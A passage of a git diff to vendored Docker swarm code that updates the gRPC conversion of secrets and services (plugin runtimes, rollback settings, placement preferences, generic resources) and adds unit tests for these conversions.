-11,31 +12,46 @@ func SecretFromGRPC(s *swarmapi.Secret) swarmtypes.Secret { secret := swarmtypes.Secret{ ID: s.ID, Spec: swarmtypes.SecretSpec{ - Annotations: swarmtypes.Annotations{ - Name: s.Spec.Annotations.Name, - Labels: s.Spec.Annotations.Labels, - }, - Data: s.Spec.Data, + Annotations: annotationsFromGRPC(s.Spec.Annotations), + Data: s.Spec.Data, + Driver: driverFromGRPC(s.Spec.Driver), }, } secret.Version.Index = s.Meta.Version.Index // Meta - secret.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) - secret.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + secret.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt) + secret.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt) + + if s.Spec.Templating != nil { + secret.Spec.Templating = &types.Driver{ + Name: s.Spec.Templating.Name, + Options: s.Spec.Templating.Options, + } + } return secret } // SecretSpecToGRPC converts Secret to a grpc Secret. func SecretSpecToGRPC(s swarmtypes.SecretSpec) swarmapi.SecretSpec { - return swarmapi.SecretSpec{ + spec := swarmapi.SecretSpec{ Annotations: swarmapi.Annotations{ Name: s.Name, Labels: s.Labels, }, - Data: s.Data, + Data: s.Data, + Driver: driverToGRPC(s.Driver), } + + if s.Templating != nil { + spec.Templating = &swarmapi.Driver{ + Name: s.Templating.Name, + Options: s.Templating.Options, + } + } + + return spec } // SecretReferencesFromGRPC converts a slice of grpc SecretReference to SecretReference diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go index aa68e01f44..5a1609aa01 100644 --- a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go @@ -1,33 +1,52 @@ -package convert +package convert // import "github.com/docker/docker/daemon/cluster/convert" import ( "fmt" "strings" types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/swarm/runtime" "github.com/docker/docker/pkg/namesgenerator" swarmapi "github.com/docker/swarmkit/api" - "github.com/docker/swarmkit/protobuf/ptypes" + "github.com/docker/swarmkit/api/genericresource" + "github.com/gogo/protobuf/proto" + gogotypes "github.com/gogo/protobuf/types" + "github.com/pkg/errors" +) + +var ( + // ErrUnsupportedRuntime returns an error if the runtime is not supported by the daemon + ErrUnsupportedRuntime = errors.New("unsupported runtime") + // ErrMismatchedRuntime returns an error if the runtime does not match the provided spec + ErrMismatchedRuntime = errors.New("mismatched Runtime and *Spec fields") ) // ServiceFromGRPC converts a grpc Service to a Service. -func ServiceFromGRPC(s swarmapi.Service) types.Service { +func ServiceFromGRPC(s swarmapi.Service) (types.Service, error) { + curSpec, err := serviceSpecFromGRPC(&s.Spec) + if err != nil { + return types.Service{}, err + } + prevSpec, err := serviceSpecFromGRPC(s.PreviousSpec) + if err != nil { + return types.Service{}, err + } service := types.Service{ ID: s.ID, - Spec: *serviceSpecFromGRPC(&s.Spec), - PreviousSpec: serviceSpecFromGRPC(s.PreviousSpec), + Spec: *curSpec, + PreviousSpec: prevSpec, Endpoint: endpointFromGRPC(s.Endpoint), } // Meta service.Version.Index = s.Meta.Version.Index - service.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) - service.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + service.CreatedAt, _ = gogotypes.TimestampFromProto(s.Meta.CreatedAt) + service.UpdatedAt, _ = gogotypes.TimestampFromProto(s.Meta.UpdatedAt) // UpdateStatus - service.UpdateStatus = types.UpdateStatus{} if s.UpdateStatus != nil { + service.UpdateStatus = &types.UpdateStatus{} switch s.UpdateStatus.State { case swarmapi.UpdateStatus_UPDATING: service.UpdateStatus.State = types.UpdateStateUpdating @@ -35,71 +54,74 @@ func ServiceFromGRPC(s swarmapi.Service) types.Service { service.UpdateStatus.State = types.UpdateStatePaused case swarmapi.UpdateStatus_COMPLETED: service.UpdateStatus.State = types.UpdateStateCompleted + case swarmapi.UpdateStatus_ROLLBACK_STARTED: + service.UpdateStatus.State = types.UpdateStateRollbackStarted + case swarmapi.UpdateStatus_ROLLBACK_PAUSED: + service.UpdateStatus.State = types.UpdateStateRollbackPaused + case swarmapi.UpdateStatus_ROLLBACK_COMPLETED: + service.UpdateStatus.State = types.UpdateStateRollbackCompleted + } + + startedAt, _ := gogotypes.TimestampFromProto(s.UpdateStatus.StartedAt) + if !startedAt.IsZero() && startedAt.Unix() != 0 { + service.UpdateStatus.StartedAt = &startedAt + } + + completedAt, _ := gogotypes.TimestampFromProto(s.UpdateStatus.CompletedAt) + if !completedAt.IsZero() && completedAt.Unix() != 0 { + service.UpdateStatus.CompletedAt = &completedAt } - service.UpdateStatus.StartedAt, _ = ptypes.Timestamp(s.UpdateStatus.StartedAt) - service.UpdateStatus.CompletedAt, _ = ptypes.Timestamp(s.UpdateStatus.CompletedAt) service.UpdateStatus.Message = s.UpdateStatus.Message } - return service + return service, nil } -func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec { +func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) (*types.ServiceSpec, error) { if spec == nil { - return nil + return nil, nil } serviceNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Networks)) for _, n := range spec.Networks { - serviceNetworks = append(serviceNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + netConfig := types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverOpts: n.DriverAttachmentOpts} + serviceNetworks = append(serviceNetworks, netConfig) + } - taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Task.Networks)) - for _, n := range spec.Task.Networks { - taskNetworks = append(taskNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + taskTemplate, err := taskSpecFromGRPC(spec.Task) + if err != nil { + return nil, err } - containerConfig := spec.Task.Runtime.(*swarmapi.TaskSpec_Container).Container - convertedSpec := &types.ServiceSpec{ - Annotations: types.Annotations{ - Name: spec.Annotations.Name, - Labels: spec.Annotations.Labels, - }, + switch t := spec.Task.GetRuntime().(type) { + case *swarmapi.TaskSpec_Container: + containerConfig := t.Container + taskTemplate.ContainerSpec = containerSpecFromGRPC(containerConfig) + taskTemplate.Runtime = types.RuntimeContainer + case *swarmapi.TaskSpec_Generic: + switch t.Generic.Kind { + case string(types.RuntimePlugin): + taskTemplate.Runtime = types.RuntimePlugin + default: + return nil, fmt.Errorf("unknown task runtime type: %s", t.Generic.Payload.TypeUrl) + } - TaskTemplate: types.TaskSpec{ - ContainerSpec: containerSpecFromGRPC(containerConfig), - Resources: resourcesFromGRPC(spec.Task.Resources), - RestartPolicy: restartPolicyFromGRPC(spec.Task.Restart), - Placement: placementFromGRPC(spec.Task.Placement), - LogDriver: driverFromGRPC(spec.Task.LogDriver), - Networks: taskNetworks, - ForceUpdate: spec.Task.ForceUpdate, - }, + default: + return nil, fmt.Errorf("error creating service; unsupported runtime %T", t) + } + convertedSpec := &types.ServiceSpec{ + Annotations: annotationsFromGRPC(spec.Annotations), + TaskTemplate: taskTemplate, Networks: serviceNetworks, EndpointSpec: endpointSpecFromGRPC(spec.Endpoint), } // UpdateConfig - if spec.Update != nil { - convertedSpec.UpdateConfig = &types.UpdateConfig{ - Parallelism: spec.Update.Parallelism, - MaxFailureRatio: spec.Update.MaxFailureRatio, - } - - convertedSpec.UpdateConfig.Delay, _ = ptypes.Duration(&spec.Update.Delay) - if spec.Update.Monitor != nil { - convertedSpec.UpdateConfig.Monitor, _ = ptypes.Duration(spec.Update.Monitor) - } - - switch spec.Update.FailureAction { - case swarmapi.UpdateConfig_PAUSE: - convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionPause - case swarmapi.UpdateConfig_CONTINUE: - convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionContinue - } - } + convertedSpec.UpdateConfig = updateConfigFromGRPC(spec.Update) + convertedSpec.RollbackConfig = updateConfigFromGRPC(spec.Rollback) // Mode switch t := spec.GetMode().(type) { @@ -111,7 +133,7 @@ func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec { } } - return convertedSpec + return convertedSpec, nil } // ServiceSpecToGRPC converts a ServiceSpec to a grpc ServiceSpec. @@ -123,12 +145,15 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { serviceNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.Networks)) for _, n := range s.Networks { - serviceNetworks = append(serviceNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + netConfig := &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverAttachmentOpts: n.DriverOpts} + serviceNetworks = append(serviceNetworks, netConfig) } taskNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.TaskTemplate.Networks)) for _, n := range s.TaskTemplate.Networks { - taskNetworks = append(taskNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + netConfig := &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverAttachmentOpts: n.DriverOpts} + taskNetworks = append(taskNetworks, netConfig) + } spec := swarmapi.ServiceSpec{ @@ -145,11 +170,52 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { Networks: serviceNetworks, } - containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec) - if err != nil { - return swarmapi.ServiceSpec{}, err + switch s.TaskTemplate.Runtime { + case types.RuntimeContainer, "": // if empty runtime default to container + if s.TaskTemplate.ContainerSpec != nil { + containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec} + } else { + // If the ContainerSpec is nil, we can't set the task runtime + return swarmapi.ServiceSpec{}, ErrMismatchedRuntime + } + case types.RuntimePlugin: + if s.TaskTemplate.PluginSpec != nil { + if s.Mode.Replicated != nil { + return swarmapi.ServiceSpec{}, errors.New("plugins must not use replicated mode") + } + + s.Mode.Global = &types.GlobalService{} // must always be global + + pluginSpec, err := proto.Marshal(s.TaskTemplate.PluginSpec) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Runtime = &swarmapi.TaskSpec_Generic{ + Generic: &swarmapi.GenericRuntimeSpec{ + Kind: string(types.RuntimePlugin), + Payload: &gogotypes.Any{ + TypeUrl: string(types.RuntimeURLPlugin), + Value: pluginSpec, + }, + }, + } + } else { + return swarmapi.ServiceSpec{}, ErrMismatchedRuntime + } + case types.RuntimeNetworkAttachment: + // NOTE(dperny) I'm leaving this case here for completeness. The actual + // code is left out out deliberately, as we should refuse to parse a + // Network Attachment runtime; it will cause weird behavior all over + // the system if we do. Instead, fallthrough and return + // ErrUnsupportedRuntime if we get one. + fallthrough + default: + return swarmapi.ServiceSpec{}, ErrUnsupportedRuntime } - spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec} restartPolicy, err := restartPolicyToGRPC(s.TaskTemplate.RestartPolicy) if err != nil { @@ -158,30 +224,39 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { spec.Task.Restart = restartPolicy if s.TaskTemplate.Placement != nil { + var preferences []*swarmapi.PlacementPreference + for _, pref := range s.TaskTemplate.Placement.Preferences { + if pref.Spread != nil { + preferences = append(preferences, &swarmapi.PlacementPreference{ + Preference: &swarmapi.PlacementPreference_Spread{ + Spread: &swarmapi.SpreadOver{ + SpreadDescriptor: pref.Spread.SpreadDescriptor, + }, + }, + }) + } + } + var platforms []*swarmapi.Platform + for _, plat := range s.TaskTemplate.Placement.Platforms { + platforms = append(platforms, &swarmapi.Platform{ + Architecture: plat.Architecture, + OS: plat.OS, + }) + } spec.Task.Placement = &swarmapi.Placement{ Constraints: s.TaskTemplate.Placement.Constraints, + Preferences: preferences, + Platforms: platforms, } } - if s.UpdateConfig != nil { - var failureAction swarmapi.UpdateConfig_FailureAction - switch s.UpdateConfig.FailureAction { - case types.UpdateFailureActionPause, "": - failureAction = swarmapi.UpdateConfig_PAUSE - case types.UpdateFailureActionContinue: - failureAction = swarmapi.UpdateConfig_CONTINUE - default: - return swarmapi.ServiceSpec{}, fmt.Errorf("unrecongized update failure action %s", s.UpdateConfig.FailureAction) - } - spec.Update = &swarmapi.UpdateConfig{ - Parallelism: s.UpdateConfig.Parallelism, - Delay: *ptypes.DurationProto(s.UpdateConfig.Delay), - FailureAction: failureAction, - MaxFailureRatio: s.UpdateConfig.MaxFailureRatio, - } - if s.UpdateConfig.Monitor != 0 { - spec.Update.Monitor = ptypes.DurationProto(s.UpdateConfig.Monitor) - } + spec.Update, err = updateConfigToGRPC(s.UpdateConfig) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Rollback, err = updateConfigToGRPC(s.RollbackConfig) + if err != nil { + return swarmapi.ServiceSpec{}, err } if s.EndpointSpec != nil { @@ -228,6 +303,44 @@ func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { return spec, nil } +func annotationsFromGRPC(ann swarmapi.Annotations) types.Annotations { + a := types.Annotations{ + Name: ann.Name, + Labels: ann.Labels, + } + + if a.Labels == nil { + a.Labels = make(map[string]string) + } + + return a +} + +// GenericResourcesFromGRPC converts a GRPC GenericResource to a GenericResource +func GenericResourcesFromGRPC(genericRes []*swarmapi.GenericResource) []types.GenericResource { + var generic []types.GenericResource + for _, res := range genericRes { + var current types.GenericResource + + switch r := res.Resource.(type) { + case *swarmapi.GenericResource_DiscreteResourceSpec: + current.DiscreteResourceSpec = &types.DiscreteGenericResource{ + Kind: r.DiscreteResourceSpec.Kind, + Value: r.DiscreteResourceSpec.Value, + } + case *swarmapi.GenericResource_NamedResourceSpec: + current.NamedResourceSpec = &types.NamedGenericResource{ + Kind: r.NamedResourceSpec.Kind, + Value: r.NamedResourceSpec.Value, + } + } + + generic = append(generic, current) + } + + return generic +} + func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequirements { var resources *types.ResourceRequirements if res != nil { @@ -240,8 +353,9 @@ func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequir } if res.Reservations != nil { resources.Reservations = &types.Resources{ - NanoCPUs: res.Reservations.NanoCPUs, - MemoryBytes: res.Reservations.MemoryBytes, + NanoCPUs: res.Reservations.NanoCPUs, + MemoryBytes: res.Reservations.MemoryBytes, + GenericResources: GenericResourcesFromGRPC(res.Reservations.Generic), } } } @@ -249,6 +363,24 @@ func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequir return resources } +// GenericResourcesToGRPC converts a GenericResource to a GRPC GenericResource +func GenericResourcesToGRPC(genericRes []types.GenericResource) []*swarmapi.GenericResource { + var generic []*swarmapi.GenericResource + for _, res := range genericRes { + var r *swarmapi.GenericResource + + if res.DiscreteResourceSpec != nil { + r = genericresource.NewDiscrete(res.DiscreteResourceSpec.Kind, res.DiscreteResourceSpec.Value) + } else if res.NamedResourceSpec != nil { + r = genericresource.NewString(res.NamedResourceSpec.Kind, res.NamedResourceSpec.Value) + } + + generic = append(generic, r) + } + + return generic +} + func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirements { var reqs *swarmapi.ResourceRequirements if res != nil { @@ -263,6 +395,7 @@ func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirem reqs.Reservations = &swarmapi.Resources{ NanoCPUs: res.Reservations.NanoCPUs, MemoryBytes: res.Reservations.MemoryBytes, + Generic: GenericResourcesToGRPC(res.Reservations.GenericResources), } } @@ -287,11 +420,11 @@ func restartPolicyFromGRPC(p *swarmapi.RestartPolicy) *types.RestartPolicy { } if p.Delay != nil { - delay, _ := ptypes.Duration(p.Delay) + delay, _ := gogotypes.DurationFromProto(p.Delay) rp.Delay = &delay } if p.Window != nil { - window, _ := ptypes.Duration(p.Window) + window, _ := gogotypes.DurationFromProto(p.Window) rp.Window = &window } @@ -320,10 +453,10 @@ func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error } if p.Delay != nil { - rp.Delay = ptypes.DurationProto(*p.Delay) + rp.Delay = gogotypes.DurationProto(*p.Delay) } if p.Window != nil { - rp.Window = ptypes.DurationProto(*p.Window) + rp.Window = gogotypes.DurationProto(*p.Window) } if p.MaxAttempts != nil { rp.MaxAttempts = *p.MaxAttempts @@ -334,10 +467,28 @@ func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error } func placementFromGRPC(p *swarmapi.Placement) *types.Placement { - var r *types.Placement - if p != nil { - r = &types.Placement{} - r.Constraints = p.Constraints + if p == nil { + return nil + } + r := &types.Placement{ + Constraints: p.Constraints, + } + + for _, pref := range p.Preferences { + if spread := pref.GetSpread(); spread != nil { + r.Preferences = append(r.Preferences, types.PlacementPreference{ + Spread: &types.SpreadOver{ + SpreadDescriptor: spread.SpreadDescriptor, + }, + }) + } + } + + for _, plat := range p.Platforms { + r.Platforms = append(r.Platforms, types.Platform{ + Architecture: plat.Architecture, + OS: plat.OS, + }) } return r @@ -364,3 +515,125 @@ func driverToGRPC(p *types.Driver) *swarmapi.Driver { Options: p.Options, } } + +func updateConfigFromGRPC(updateConfig *swarmapi.UpdateConfig) *types.UpdateConfig { + if updateConfig == nil { + return nil + } + + converted := &types.UpdateConfig{ + Parallelism: updateConfig.Parallelism, + MaxFailureRatio: updateConfig.MaxFailureRatio, + } + + converted.Delay = updateConfig.Delay + if updateConfig.Monitor != nil { + converted.Monitor, _ = gogotypes.DurationFromProto(updateConfig.Monitor) + } + + switch updateConfig.FailureAction { + case swarmapi.UpdateConfig_PAUSE: + converted.FailureAction = types.UpdateFailureActionPause + case swarmapi.UpdateConfig_CONTINUE: + converted.FailureAction = types.UpdateFailureActionContinue + case swarmapi.UpdateConfig_ROLLBACK: + converted.FailureAction = types.UpdateFailureActionRollback + } + + switch updateConfig.Order { + case swarmapi.UpdateConfig_STOP_FIRST: + converted.Order = types.UpdateOrderStopFirst + case swarmapi.UpdateConfig_START_FIRST: + converted.Order = types.UpdateOrderStartFirst + } + + return converted +} + +func updateConfigToGRPC(updateConfig *types.UpdateConfig) (*swarmapi.UpdateConfig, error) { + if updateConfig == nil { + return nil, nil + } + + converted := &swarmapi.UpdateConfig{ + Parallelism: updateConfig.Parallelism, + Delay: updateConfig.Delay, + MaxFailureRatio: updateConfig.MaxFailureRatio, + } + + switch updateConfig.FailureAction { + case types.UpdateFailureActionPause, "": + converted.FailureAction = swarmapi.UpdateConfig_PAUSE + case types.UpdateFailureActionContinue: + converted.FailureAction = swarmapi.UpdateConfig_CONTINUE + case types.UpdateFailureActionRollback: + converted.FailureAction = swarmapi.UpdateConfig_ROLLBACK + default: + return nil, fmt.Errorf("unrecognized update failure action %s", updateConfig.FailureAction) + } + if updateConfig.Monitor != 0 { + converted.Monitor = gogotypes.DurationProto(updateConfig.Monitor) + } + + switch updateConfig.Order { + case types.UpdateOrderStopFirst, "": + converted.Order = swarmapi.UpdateConfig_STOP_FIRST + case types.UpdateOrderStartFirst: + converted.Order = swarmapi.UpdateConfig_START_FIRST + default: + return nil, fmt.Errorf("unrecognized update order %s", updateConfig.Order) + } + + return converted, nil +} + +func networkAttachmentSpecFromGRPC(attachment swarmapi.NetworkAttachmentSpec) *types.NetworkAttachmentSpec { + return &types.NetworkAttachmentSpec{ + ContainerID: attachment.ContainerID, + } +} + +func taskSpecFromGRPC(taskSpec swarmapi.TaskSpec) (types.TaskSpec, error) { + taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(taskSpec.Networks)) + for _, n := range taskSpec.Networks { + netConfig := types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases, DriverOpts: n.DriverAttachmentOpts} + taskNetworks = append(taskNetworks, netConfig) + } + + t := types.TaskSpec{ + Resources: resourcesFromGRPC(taskSpec.Resources), + RestartPolicy: restartPolicyFromGRPC(taskSpec.Restart), + Placement: placementFromGRPC(taskSpec.Placement), + LogDriver: driverFromGRPC(taskSpec.LogDriver), + Networks: taskNetworks, + ForceUpdate: taskSpec.ForceUpdate, + } + + switch taskSpec.GetRuntime().(type) { + case *swarmapi.TaskSpec_Container, nil: + c := taskSpec.GetContainer() + if c != nil { + t.ContainerSpec = containerSpecFromGRPC(c) + } + case *swarmapi.TaskSpec_Generic: + g := taskSpec.GetGeneric() + if g != nil { + switch g.Kind { + case string(types.RuntimePlugin): + var p runtime.PluginSpec + if err := proto.Unmarshal(g.Payload.Value, &p); err != nil { + return t, errors.Wrap(err, "error unmarshalling plugin spec") + } + t.PluginSpec = &p + } + } + case *swarmapi.TaskSpec_Attachment: + a := taskSpec.GetAttachment() + if a != nil { + t.NetworkAttachmentSpec = networkAttachmentSpecFromGRPC(*a) + } + t.Runtime = types.RuntimeNetworkAttachment + } + + return t, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go new file mode 100644 index 0000000000..ad5f0d4494 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service_test.go @@ -0,0 +1,308 @@ +package convert // import "github.com/docker/docker/daemon/cluster/convert" + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/api/types/swarm/runtime" + swarmapi "github.com/docker/swarmkit/api" + google_protobuf3 "github.com/gogo/protobuf/types" + "gotest.tools/assert" +) + +func TestServiceConvertFromGRPCRuntimeContainer(t *testing.T) { + gs := swarmapi.Service{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: nil, + UpdatedAt: nil, + }, + SpecVersion: &swarmapi.Version{ + Index: 1, + }, + Spec: swarmapi.ServiceSpec{ + Task: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Container{ + Container: &swarmapi.ContainerSpec{ + Image: "alpine:latest", + }, + }, + }, + }, + } + + svc, err := ServiceFromGRPC(gs) + if err != nil { + t.Fatal(err) + } + + if svc.Spec.TaskTemplate.Runtime != swarmtypes.RuntimeContainer { + t.Fatalf("expected type %s; received %T", swarmtypes.RuntimeContainer, svc.Spec.TaskTemplate.Runtime) + } +} + +func TestServiceConvertFromGRPCGenericRuntimePlugin(t *testing.T) { + kind := string(swarmtypes.RuntimePlugin) + url := swarmtypes.RuntimeURLPlugin + gs := swarmapi.Service{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: nil, + UpdatedAt: nil, + }, + SpecVersion: &swarmapi.Version{ + Index: 1, + }, + Spec: swarmapi.ServiceSpec{ + Task: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Generic{ + Generic: &swarmapi.GenericRuntimeSpec{ + Kind: kind, + Payload: &google_protobuf3.Any{ + TypeUrl: string(url), + }, + }, + }, + }, + }, + } + + svc, err := ServiceFromGRPC(gs) + if err != nil { + t.Fatal(err) + } + + if svc.Spec.TaskTemplate.Runtime != swarmtypes.RuntimePlugin { + t.Fatalf("expected type %s; received %T", swarmtypes.RuntimePlugin, svc.Spec.TaskTemplate.Runtime) + } +} + +func TestServiceConvertToGRPCGenericRuntimePlugin(t *testing.T) { + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + Runtime: swarmtypes.RuntimePlugin, + PluginSpec: &runtime.PluginSpec{}, + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + + svc, err := ServiceSpecToGRPC(s) + if err != nil { + t.Fatal(err) + } + + v, ok := svc.Task.Runtime.(*swarmapi.TaskSpec_Generic) + if !ok { + t.Fatal("expected type swarmapi.TaskSpec_Generic") + } + + if v.Generic.Payload.TypeUrl != string(swarmtypes.RuntimeURLPlugin) { + t.Fatalf("expected url %s; received %s", swarmtypes.RuntimeURLPlugin, v.Generic.Payload.TypeUrl) + } +} + +func TestServiceConvertToGRPCContainerRuntime(t *testing.T) { + image := "alpine:latest" + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + ContainerSpec: &swarmtypes.ContainerSpec{ + Image: image, + }, + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + + svc, err := ServiceSpecToGRPC(s) + if err != nil { + t.Fatal(err) + } + + v, ok := svc.Task.Runtime.(*swarmapi.TaskSpec_Container) + if !ok { + t.Fatal("expected type swarmapi.TaskSpec_Container") + } + + if v.Container.Image != image { + t.Fatalf("expected image %s; received %s", image, v.Container.Image) + } +} + +func TestServiceConvertToGRPCGenericRuntimeCustom(t *testing.T) { + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + Runtime: "customruntime", + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + + if _, err := ServiceSpecToGRPC(s); err != ErrUnsupportedRuntime { + t.Fatal(err) + } +} + +func TestServiceConvertToGRPCIsolation(t *testing.T) { + cases := []struct { + name string + from containertypes.Isolation + to swarmapi.ContainerSpec_Isolation + }{ + {name: "empty", from: containertypes.IsolationEmpty, to: swarmapi.ContainerIsolationDefault}, + {name: "default", from: containertypes.IsolationDefault, to: swarmapi.ContainerIsolationDefault}, + {name: "process", from: containertypes.IsolationProcess, to: swarmapi.ContainerIsolationProcess}, + {name: "hyperv", from: containertypes.IsolationHyperV, to: swarmapi.ContainerIsolationHyperV}, + {name: "proCess", from: containertypes.Isolation("proCess"), to: swarmapi.ContainerIsolationProcess}, + {name: "hypErv", from: containertypes.Isolation("hypErv"), to: swarmapi.ContainerIsolationHyperV}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + ContainerSpec: &swarmtypes.ContainerSpec{ + Image: "alpine:latest", + Isolation: c.from, + }, + }, + Mode: swarmtypes.ServiceMode{ + Global: &swarmtypes.GlobalService{}, + }, + } + res, err := ServiceSpecToGRPC(s) + assert.NilError(t, err) + v, ok := res.Task.Runtime.(*swarmapi.TaskSpec_Container) + if !ok { + t.Fatal("expected type swarmapi.TaskSpec_Container") + } + assert.Equal(t, c.to, v.Container.Isolation) + }) + } +} + +func TestServiceConvertFromGRPCIsolation(t *testing.T) { + cases := []struct { + name string + from swarmapi.ContainerSpec_Isolation + to containertypes.Isolation + }{ + {name: "default", to: containertypes.IsolationDefault, from: swarmapi.ContainerIsolationDefault}, + {name: "process", to: containertypes.IsolationProcess, from: swarmapi.ContainerIsolationProcess}, + {name: "hyperv", to: containertypes.IsolationHyperV, from: swarmapi.ContainerIsolationHyperV}, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + gs := swarmapi.Service{ + Meta: swarmapi.Meta{ + Version: swarmapi.Version{ + Index: 1, + }, + CreatedAt: nil, + UpdatedAt: nil, + }, + SpecVersion: &swarmapi.Version{ + Index: 1, + }, + Spec: swarmapi.ServiceSpec{ + Task: swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Container{ + Container: &swarmapi.ContainerSpec{ + Image: "alpine:latest", + Isolation: c.from, + }, + }, + }, + }, + } + + svc, err := ServiceFromGRPC(gs) + if err != nil { + t.Fatal(err) + } + + assert.Equal(t, c.to, svc.Spec.TaskTemplate.ContainerSpec.Isolation) + }) + } +} + +func TestServiceConvertToGRPCNetworkAtachmentRuntime(t *testing.T) { + someid := "asfjkl" + s := swarmtypes.ServiceSpec{ + TaskTemplate: swarmtypes.TaskSpec{ + Runtime: swarmtypes.RuntimeNetworkAttachment, + NetworkAttachmentSpec: &swarmtypes.NetworkAttachmentSpec{ + ContainerID: someid, + }, + }, + } + + // discard the service, which will be empty + _, err := ServiceSpecToGRPC(s) + if err == nil { + t.Fatalf("expected error %v but got no error", ErrUnsupportedRuntime) + } + if err != ErrUnsupportedRuntime { + t.Fatalf("expected error %v but got error %v", ErrUnsupportedRuntime, err) + } +} + +func TestServiceConvertToGRPCMismatchedRuntime(t *testing.T) { + // NOTE(dperny): an earlier version of this test was for code that also + // converted network attachment tasks to GRPC. that conversion code was + // removed, so if this loop body seems a bit complicated, that's why. + for i, rt := range []swarmtypes.RuntimeType{ + swarmtypes.RuntimeContainer, + swarmtypes.RuntimePlugin, + } { + for j, spec := range []swarmtypes.TaskSpec{ + {ContainerSpec: &swarmtypes.ContainerSpec{}}, + {PluginSpec: &runtime.PluginSpec{}}, + } { + // skip the cases, where the indices match, which would not error + if i == j { + continue + } + // set the task spec, then change the runtime + s := swarmtypes.ServiceSpec{ + TaskTemplate: spec, + } + s.TaskTemplate.Runtime = rt + + if _, err := ServiceSpecToGRPC(s); err != ErrMismatchedRuntime { + t.Fatalf("expected %v got %v", ErrMismatchedRuntime, err) + } + } + } +} + +func TestTaskConvertFromGRPCNetworkAttachment(t *testing.T) { + containerID := "asdfjkl" + s := swarmapi.TaskSpec{ + Runtime: &swarmapi.TaskSpec_Attachment{ + Attachment: &swarmapi.NetworkAttachmentSpec{ + ContainerID: containerID, + }, + }, + } + ts, err := taskSpecFromGRPC(s) + if err != nil { + t.Fatal(err) + } + if ts.NetworkAttachmentSpec == nil { + t.Fatal("expected task spec to have network attachment spec") + } + if ts.NetworkAttachmentSpec.ContainerID != containerID { + t.Fatalf("expected network attachment spec container id to be %q, was %q", containerID, ts.NetworkAttachmentSpec.ContainerID) + } + if ts.Runtime != swarmtypes.RuntimeNetworkAttachment { + t.Fatalf("expected Runtime to be %v", 